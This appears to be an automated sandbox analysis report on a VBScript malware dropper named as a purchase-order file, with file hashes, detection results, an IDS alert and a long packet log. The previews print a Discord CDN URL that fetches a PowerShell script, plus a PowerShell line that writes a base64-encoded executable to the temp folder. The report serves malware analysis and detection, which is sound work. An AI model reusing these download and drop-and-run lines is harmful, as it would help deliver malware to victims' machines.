                                                  SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                  Process:C:\Windows\System32\wscript.exe
                                                  File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):449316
                                                  Entropy (8bit):5.978461339679047
                                                  Encrypted:false
                                                  SSDEEP:12288:Gpc42e4IlGV38d4wLD0uMjh/hWaGGFT1/gZz:+cDe4J8d4wnjMV/MGFY
                                                  MD5:A71B01EF9FB1E8252D07F776432A39DE
                                                  SHA1:6A00FECFE8CDF15A8C5A62FDE645D691000A9D46
                                                  SHA-256:12CF3C330193F494DEE36340D31CB9EE1897365FA8280065C6B397230A7488E2
                                                  SHA-512:0DDB623E0EB1E0D1DAC0DFAD4209C3A5BD69C17A071E71461DCEAA23C5BB6B309C58762CBF33637BE7D66808160E9358D5519D3B92A31CD1A7FE7B6D362F96A4
                                                  Malicious:false
                                                  Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAEbNCaYAAAAAAAAAAOAAIgALATAAABoFAAAIAAAAAAAA7jkFAAAgAAAAQAUAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACABQAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJg5BQBTAAAAAEAFALYFAAAAAAAAAAAAAAAAAAAAAAAAAGAFAAwAAAA4OQUAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA9BkFAAAgAAAAGgUAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAALYFAAAAQAUAAAYAAAAcBQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAFAAACAAAAIgUAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADQOQUAAAAAAEgAAAACAAUASMcEAPBxAAADAAIAQAAABpDGBAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKCTdLK/CJNf3hN50slzq12meu4CN+hc870snKgS2+3THdUz46/4l34IKbgTS1NvC1oZbVYvKZ2zapEj9yj4n7VxIqkDpwCLL324u9/H7o4ihHl6T
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:Nlllultnxj:NllU
                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                  Malicious:false
                                                  Preview:@...e................................................@..........
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):336896
                                                  Entropy (8bit):7.905067748195128
                                                  Encrypted:false
                                                  SSDEEP:6144:0FH6CPJn2jfSwAM5sjgs62SEvTRvq8H4Zt8QSHa+n6z8vmw:mauN2jfSwAnjgs6ZELBq8YZtXya+n6z6
                                                  MD5:3A4DEEB8FD959AF313C23032D971093E
                                                  SHA1:DE2A8A0C7799E7480D083EA3DE40F3DE1FF95FC5
                                                  SHA-256:C1406D1F48D1919D859F9B201F812467AAFFA937A84C7027EC1B3DEBB8396ACE
                                                  SHA-512:0CD2BD591D2A826ECFD3B06870EA101BF7E97B99257F05A762DD275A5BFE1843D93D93C49D5B12507DD781EF1892C307D35524A7E5EC1CBAA30DC7E826434FB4
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F............."...0..............9... ...@....@.. ....................................`..................................9..S....@.......................`......89..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......H....q......@.....................................................t...._..y..s.].z..7.\.,........3...~.)..KSo.Z.mV/)..j.#.(...q"...../}.....".yzOj.....I.hx..S+z.w.*pe...y.A...........$..{..I..7...xaE).j......Q.....T._~.cF..U.'.9.X..U.%Ak}v..\.5...s,JD.....w}.~.@\..j,..W./#..:...P.O....s..u..o...eO#..~.....":...V.9.....zC.(.M.|5.H....jBQ.z..c.8..51m.a......"5...7j...'.....P..k.P.w{.j......2..S3...].4..D.....V...$..y.sC3.D.._7...".5=6....u,..Z..9.%..i...y...
                                                  File type:ASCII text, with CRLF line terminators
                                                  Entropy (8bit):5.108870150500356
                                                  TrID:
                                                  • Visual Basic Script (13500/0) 100.00%
                                                  File name:PO_11171111221.Vbs.vbs
                                                  File size:2'186 bytes
                                                  MD5:3b3169de8bdf739bd63c74c42a338033
                                                  SHA1:a5c91d1b08ca5c668f03a1af2ae82ca8a792b47b
                                                  SHA256:b35d6e6054b695ac319bf4ddee0754ca6391be5c032aa7f448a2dfb9a45b4e33
                                                  SHA512:97b98f3b10ae3b5f373715a1c28cf8897ed39b793e2790baf59142e6c4eb170fc0056147a90dc7e31eadb8f2315d11d9d109d7bbebafc4d194424c1207f213c8
                                                  SSDEEP:48:ICqQIjviLaRE/jyJ2yAwJGrn/kJBJk/mLJ5+/q:ICqpnGryJ3HJGr/kJfk/mLJ5+/q
                                                  TLSH:F5416537ED07D3615C378B0F856FE04DDA10408B71144550BEAC8846BF36BE8EAA82CD
                                                  File Content Preview:' Constants to avoid magic strings..Const URL = "https://cdn.discordapp.com/attachments/1295304757166080020/1316923696224669696/fore.ps1?ex=675cd044&is=675b7ec4&hm=5608089203d1f55754eb42ae1b19e52da07e426935e063abf1f2bb096cfc394e&"..Const DownloadPath = "C
                                                  Icon Hash:68d69b8f86ab9a86
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-13T07:51:05.600488+01002018856ET MALWARE Windows executable base64 encoded1162.159.129.233443192.168.2.449730TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 13, 2024 07:51:03.634324074 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:03.634371042 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:03.634593010 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:03.643060923 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:03.643095016 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:04.865139961 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:04.865361929 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:04.912950039 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:04.912971973 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:04.913383961 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:04.913474083 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:04.915616035 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:04.959343910 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.325897932 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.325973034 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.325993061 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.326036930 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.326044083 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.326077938 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.326083899 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.326090097 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.326133966 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.326139927 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.326179981 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.326189041 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.326231003 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.334415913 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.334503889 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.342627048 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.342706919 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.342729092 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.342778921 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.350991964 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.351051092 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.445686102 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.445801020 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.517904043 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.518002033 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.518018961 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.518062115 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.523387909 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.523449898 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.523468018 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.523509026 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.531502962 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.531565905 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.531589031 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.531639099 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.539479971 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.539535046 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.539550066 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.539592028 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.547553062 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.547611952 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.547626972 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.547676086 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.555571079 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.555629969 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.563571930 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.563637972 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.563654900 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.563699961 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.571552038 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.571619987 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.571641922 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.571683884 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.579622984 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.579684973 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.579693079 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.579732895 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.587810993 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.587874889 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.594059944 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.594136000 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.594197989 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.594247103 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.600512981 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.600680113 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.600706100 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.600766897 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.710203886 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.710391998 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.710419893 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.710473061 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.712445974 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.712503910 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.712521076 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.712599039 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.717267990 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.717376947 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.719477892 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.719532967 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.723855972 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.723917961 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.728452921 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.728519917 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.737320900 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.737401009 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.745904922 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.745973110 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.750257969 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.750325918 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.759068966 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.759130001 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.767585993 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.767664909 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.776252985 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.776340008 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.780735970 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.780808926 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.789319038 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.789383888 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.798065901 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.798132896 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.802546978 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.802612066 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.902633905 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.902828932 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.907901049 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.907974005 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.914720058 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.914789915 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.921433926 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.921500921 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.924483061 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.924546957 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.930802107 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.930871010 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.936811924 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.936885118 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.939871073 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.939946890 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.945898056 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.945964098 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.951946974 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.952024937 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.959511042 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.959585905 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.961180925 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.961260080 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.967133999 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.967215061 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.973220110 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.973289967 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.976373911 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.976459980 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.982387066 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.982464075 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.985452890 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.985524893 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.991537094 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.991615057 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:05.997531891 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:05.997615099 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.003616095 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.003695011 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.006702900 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.006769896 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.012789965 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.012968063 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.015731096 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.015810966 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.021796942 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.021858931 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.096002102 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.096206903 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.100236893 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.100317001 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.104949951 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.105022907 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.109500885 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.109565020 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.111855984 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.111922026 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.118549109 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.118571043 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.118616104 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.118629932 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.132924080 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.132944107 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.133003950 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.133018017 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.133058071 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.146575928 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.146615982 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.146766901 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.146775961 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.146817923 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.158953905 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.158994913 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.159034014 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.159040928 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.159068108 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.159075975 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.172271013 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.172316074 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.172354937 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.172363997 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.172375917 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.172403097 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.183880091 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.183923960 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.183962107 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.183969975 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.183995008 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.184003115 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.287178993 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.287228107 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.287393093 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.287415981 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.287466049 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.295437098 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.295480967 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.295528889 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.295538902 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.295547962 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.295577049 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.304570913 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.304615974 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.304646969 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.304657936 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.304673910 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.304696083 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.313230991 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.313277006 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.313314915 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.313325882 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.313339949 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.313370943 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.320528030 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.320575953 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.320612907 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.320622921 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.320633888 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.320663929 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.329613924 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.329658985 CET44349730162.159.129.233192.168.2.4
